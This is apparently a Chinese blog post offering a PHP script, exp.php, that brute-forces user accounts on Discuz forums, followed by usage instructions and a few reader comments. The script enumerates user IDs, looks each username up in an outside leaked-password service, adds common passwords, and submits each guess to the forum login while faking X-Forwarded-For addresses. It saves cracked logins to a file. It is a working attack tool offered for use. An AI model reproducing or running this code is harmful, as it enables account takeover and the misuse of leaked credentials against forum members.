以下代码保存为exp.php
<?php
class fuckdz{
public function sgk($user){
$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
preg_match_all("/7%\">(.*)</isU",$a,$arr);
unset($arr[0]);
foreach ($arr as $key=>$r){
return $r;
}
}
public function getuid($host,$uid){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' => array (
'method' => 'GET',
'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=>15, )
);
$context = stream_context_create($opts);
$a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);
if(strpos($a,'charset=utf-8')){
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
}
if(preg_match("/<title>(.*)的个人/isU",$a,$arr)){
$a=str_replace("\r","",trim($arr[1]));
$a=trim(str_replace("\n","",$a));
return $a;
}else{
return false;
}
}
public function is_pass($host,$user,$pass){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' => array (
'method' => 'GET',
'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=>15, )
);
$context = stream_context_create($opts);
$a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);
if(strpos($a,"window.location.href")){
return true;
}else{
return false;
}
}
public function crack($host,$a,$b){
$host=str_replace("http://","",$host);
$host="http://".$host."/";
for($vip=$a;$vip<=$b;$vip++){
if(!($user=$this->getuid($host,$vip))){
continue;
}
$pass=$this->sgk($user);
array_push($pass,"123456");
array_push($pass,"654321");
array_push($pass,"123123");
array_push($pass,"woaini");
array_push($pass,"caonima");
array_push($pass,"12345");
array_push($pass,"12345789");
array_push($pass,"5201314");
array_push($pass,"1314520");
array_push($pass,$user);
array_push($pass,$user."123456");
array_push($pass,"abc123");
array_push($pass,$user."..");
for($i=0;isset($pass[$i]);$i++){
echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";
if($this->is_pass($host,$user,$pass[$i])){
echo "爆破成功!\r\n--------------------";
file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);
break;
}else{
echo "爆破失败";
}
}
}
}
}
$f=new fuckdz();
//error_reporting(0);
set_time_limit(0);
if(empty($argv[1])){
print_r("
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://phpinfo.me/ 1 255
结果保存在ok.txt里
Blog:http://phpinfo.me
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n\n\n
");
}else{
if(!empty($argv[1])){
$f->crack($argv[1],$argv[2],$argv[3]);
}else{
echo "逗比";
}
}
?>
----------------------------------
开始爆破:php.exe$argv[0] 网址 起始uid 结束uid
示例: php.exe exp.php http://www.hackqing.com/ 1 255
结果保存在ok.txt里
评论:
小王 2014-06-27 16:18
博主!你的博客需要翻墙才能访问!!我翻墙速度很慢!有什么快点的方法呢!有没有什么快点的办法找到高速代理IP呢
回复
admin 2014-06-27 16:21
@小王:不可能啊。服务器在国内啊。
回复
admin 2014-06-27 16:24
@小王:你让别人试试不得了,网友什么的。不存在打不开的情况
回复
